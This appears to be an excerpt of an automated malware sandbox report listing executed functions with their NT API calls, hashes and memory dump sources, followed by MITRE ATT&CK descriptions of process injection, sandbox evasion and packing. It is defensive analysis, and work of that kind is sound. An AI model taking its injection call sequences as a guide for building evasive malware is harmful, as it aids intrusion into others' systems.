Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F

Function 00403247 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F

Function 0040326C Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF

Function 00403290 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B

Analysis Process: vbirvcePID: 736, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	8.7%
Dynamic/Decrypted Code Coverage:	40.7%
Signature Coverage:	0%
Total number of Nodes:	118
Total number of Limit Nodes:	4

Executed Functions

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.1996471275.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbirvce.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.1996471275.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbirvce.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.1996471275.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbirvce.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.1996471275.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbirvce.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.1996471275.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbirvce.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000005.00000002.1996471275.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbirvce.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 006C003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006C024D

Strings

kernel32.dll, xrefs: 006C008F, 006C0095
cess, xrefs: 006C018D

Memory Dump Source

Source File: 00000005.00000002.1996759719.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_vbirvce.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: a16ad12f4b347be2b0c0f4aa935509a1366d3d88948981c0025655a100cedf30
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: F4525874A01229DFDB64CF58C985BA8BBB1BF09304F1480D9E94DAB351DB30AE95DF14

Function 007134BE Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007134E6
Module32First.KERNEL32(00000000,00000224), ref: 00713506

Memory Dump Source

Source File: 00000005.00000002.1996874431.0000000000701000.00000040.00000020.00020000.00000000.sdmp, Offset: 00701000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_701000_vbirvce.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: c571adc3fb9c7ac8e6938596df9170ab0ce8f86f2714f356d56fb8661ddf2e14
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 1FF062362007146BD7213ABD988DABAB6ECAF49725F140528EA46A14C0DA78ED858A61

Function 006C0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,006C0223,?,?), ref: 006C0E19
SetErrorMode.KERNELBASE(00000000,?,?,006C0223,?,?), ref: 006C0E1E

Memory Dump Source

Source File: 00000005.00000002.1996759719.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_vbirvce.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 4685c5a770edda50dbe0b2dc837f552568978304271461a35dbeccacd63f79b3
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 97D01231145129B7D7003A94DC0DBDD7B1CDF09B62F008411FB0DD9180C770994046E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.1996471275.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbirvce.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.1996471275.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbirvce.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.1996471275.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbirvce.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.1996471275.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbirvce.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 0071317D Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007131CE

Memory Dump Source

Source File: 00000005.00000002.1996874431.0000000000701000.00000040.00000020.00020000.00000000.sdmp, Offset: 00701000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_701000_vbirvce.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: a7b6f22b35a090b18b3dafe03c7b64698d1311a2110b010bc9266e4cdb571224
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 9E113C79A00208EFDB01DF98C989E98BFF5AF08350F158094F9489B362D375EA90DF80

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.1996471275.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbirvce.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
